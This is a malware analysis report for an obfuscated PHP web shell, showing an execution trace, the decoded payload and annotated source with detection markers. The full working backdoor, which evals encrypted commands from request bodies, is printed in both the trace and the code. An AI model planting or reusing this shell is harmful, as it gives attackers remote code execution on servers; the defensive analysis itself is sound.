PHP Malware Analysis

anon.php

md5: 8b6b7b2c77e5043d85f9bb73c526e7f4


Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

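Failed to deobfuscate code (the decoded payload is still visible in the execution trace below, as the return value of the second str_replace call)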

Execution traces

data/traces/8b6b7b2c77e5043d85f9bb73c526e7f4_trace-1676243296.81.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:08:42.707823]
1	0	1	0.000198	393512
1	3	0	0.000260	396088	{main}	1		/var/www/html/uploads/anon.php	0	0
1		A						/var/www/html/uploads/anon.php	2	$o = 'utbsbs"),$m)bs==1) {@ob_starbst();@bsbsevabsl(@gzuncompbsress(@x(@babsbssebs64bs_decobsde($bsm[1]),$k)));$o=@obbsbs_'
2	4	0	0.000298	396088	str_replace	0		/var/www/html/uploads/anon.php	3	3	'Dz'	''	'DzcrDzeate_DzfDzuDznDzction'
2	4	1	0.000316	396224
2	4	R			'create_function'
1		A						/var/www/html/uploads/anon.php	3	$A = 'create_function'
1		A						/var/www/html/uploads/anon.php	4	$O = '$k="2bs3bfafbs5e";$bskh="d479bsbs808304e1";bs$kbsf="332a0b7a7bs3d4";$bsp="pumykZXbsj8bs5jIFVWY";bsfunctiobsn x($tbs,b'
1		A						/var/www/html/uploads/anon.php	5	$v = '++){$o.=$t{bs$i}^$k{$bsj};bsbs}}returbsn $bso;}if (@preg_matbscbsh("/$kh(.+)$kfbs/",@bsfile_gbsebst_conbstents("php:/bs/inp'
1		A						/var/www/html/uploads/anon.php	6	$c = 'get_contents()bs;@ob_ebsnd_cbslean(bs);$r=@babsse64_encobsde(@xbs(@gzcbsombspress($bsobs)bs,bs$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/anon.php	7	$S = 's$k){$cbs=strlenbs($k);$l=sbstrlen($bstbs)bs;$o="";for($i=0;bsbs$i<$l;){fbsorbs($j=0bsbsbs;($j<$c&&$i<$l);$j+bsbs+,$i'
2	5	0	0.000425	396768	str_replace	0		/var/www/html/uploads/anon.php	8	3	'bs'	''	'$k="2bs3bfafbs5e";$bskh="d479bsbs808304e1";bs$kbsf="332a0b7a7bs3d4";$bsp="pumykZXbsj8bs5jIFVWY";bsfunctiobsn x($tbs,bs$k){$cbs=strlenbs($k);$l=sbstrlen($bstbs)bs;$o="";for($i=0;bsbs$i<$l;){fbsorbs($j=0bsbsbs;($j<$c&&$i<$l);$j+bsbs+,$i++){$o.=$t{bs$i}^$k{$bsj};bsbs}}returbsn $bso;}if (@preg_matbscbsh("/$kh(.+)$kfbs/",@bsfile_gbsebst_conbstents("php:/bs/inputbsbs"),$m)bs==1) {@ob_starbst();@bsbsevabsl(@gzuncompbsress(@x(@babsbssebs64bs_decobsde($bsm[1]),$k)));$o=@obbsbs_get_contents()bs;@ob_ebsnd_cbslean(bs);'
2	5	1	0.000462	397376
2	5	R			'$k="23bfaf5e";$kh="d479808304e1";$kf="332a0b7a73d4";$p="pumykZXj85jIFVWY";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/anon.php	8	$Y = '$k="23bfaf5e";$kh="d479808304e1";$kf="332a0b7a73d4";$p="pumykZXj85jIFVWY";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000519	396640	create_function	0		/var/www/html/uploads/anon.php	9	2	''	'$k="23bfaf5e";$kh="d479808304e1";$kf="332a0b7a73d4";$p="pumykZXj85jIFVWY";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000601	404680	{internal eval}	1		/var/www/html/uploads/anon.php	9	0
3	7	1	0.000616	404680
3	7	R			NULL
2	6	1	0.000631	403312
2	6	R			'\000lambda_9'
1		A						/var/www/html/uploads/anon.php	9	$q = '\000lambda_9'
2	8	0	0.000658	403248	__lambda_func	1		/var/www/html/uploads/anon.php	9	0
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$k = '23bfaf5e'
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$kh = 'd479808304e1'
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$kf = '332a0b7a73d4'
2		A						/var/www/html/uploads/anon.php(9) : runtime-created function	1	$p = 'pumykZXj85jIFVWY'
3	9	0	0.000719	403304	file_get_contents	0		/var/www/html/uploads/anon.php(9) : runtime-created function	1	1	'php://input'
3	9	1	0.000741	404040
3	9	R			''
3	10	0	0.000754	404024	preg_match	0		/var/www/html/uploads/anon.php(9) : runtime-created function	1	3	'/d479808304e1(.+)332a0b7a73d4/'	''	NULL
3	10	1	0.000804	404184
3	10	R			0
2	8	1	0.000819	403944
1	3	1	0.000827	403944
			0.000855	321640
TRACE END   [2023-02-12 21:08:42.708515]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// Obfuscated web-shell loader. The real payload is stored as five string
// fragments ($O, $S, $v, $o, $c) that are declared out of order and padded
// with the filler token "bs", so names such as eval, base64_decode and
// file_get_contents never appear in plain text in this file. Keyword-only
// scanning will therefore miss it; the reliable static signals are a function
// name built with str_replace() and a call through a variable.

// Fragment 4 of 5 (concatenation order is fixed by the $Y line further down).
$o='utbsbs"),$m)bs==1) {@ob_starbst();@bsbsevabsl(@gzuncompbsress(@x(@babsbssebs64bs_decobsde($bsm[1]),$k)));$o=@obbsbs_';
// Stripping the filler "Dz" yields the string 'create_function'.
// create_function() evaluates its code argument internally; it was deprecated
// in PHP 7.2 and removed in PHP 8.0.
$A=str_replace('Dz','','DzcrDzeate_DzfDzuDznDzction');
// Fragment 1 of 5: key $k, header marker $kh, footer marker $kf, response prefix $p.
$O='$k="2bs3bfafbs5e";$bskh="d479bsbs808304e1";bs$kbsf="332a0b7a7bs3d4";$bsp="pumykZXbsj8bs5jIFVWY";bsfunctiobsn x($tbs,b';
// Fragment 3 of 5: tail of the XOR helper and the read of the raw request body.
// The curly-brace string offsets used here were also removed in PHP 8.0.
$v='++){$o.=$t{bs$i}^$k{$bsj};bsbs}}returbsn $bso;}if (@preg_matbscbsh("/$kh(.+)$kfbs/",@bsfile_gbsebst_conbstents("php:/bs/inp';
// Fragment 5 of 5: captured output is compressed, XORed, base64-encoded and printed.
$c='get_contents()bs;@ob_ebsnd_cbslean(bs);$r=@babsse64_encobsde(@xbs(@gzcbsombspress($bsobs)bs,bs$k));print("$p$kh$r$kf");}';
// Fragment 2 of 5: body of helper x(), a repeating-key XOR of $t with $k.
$S='s$k){$cbs=strlenbs($k);$l=sbstrlen($bstbs)bs;$o="";for($i=0;bsbs$i<$l;){fbsorbs($j=0bsbsbs;($j<$c&&$i<$l);$j+bsbs+,$i';
// Reassemble the payload in its true order and strip the "bs" filler.
// Decoded behaviour: read php://input, look for data between the markers
// d479808304e1 and 332a0b7a73d4, base64-decode it, XOR it with $k,
// gzuncompress it and eval() the result. Output is buffered and returned
// encoded the same way, prefixed with pumykZXj85jIFVWY. Every call carries
// the @ operator, so failures produce no warnings or log noise.
// Detection: request bodies carrying both marker strings, and responses that
// start with the prefix followed by the header marker. These values are
// specific to this sample.
$Y=str_replace('bs','',$O.$S.$v.$o.$c);
// Build an anonymous function from the payload and run it at once. With an
// empty request body the regex does not match and nothing is printed, so an
// ordinary browser request to this file returns a blank page.
// NOTE(review): the trace ran this sample from an uploads/ directory; if that
// reflects where it was found, disable PHP execution for upload paths and
// verify the type of uploaded files.
$q=$A('',$Y);$q();
?>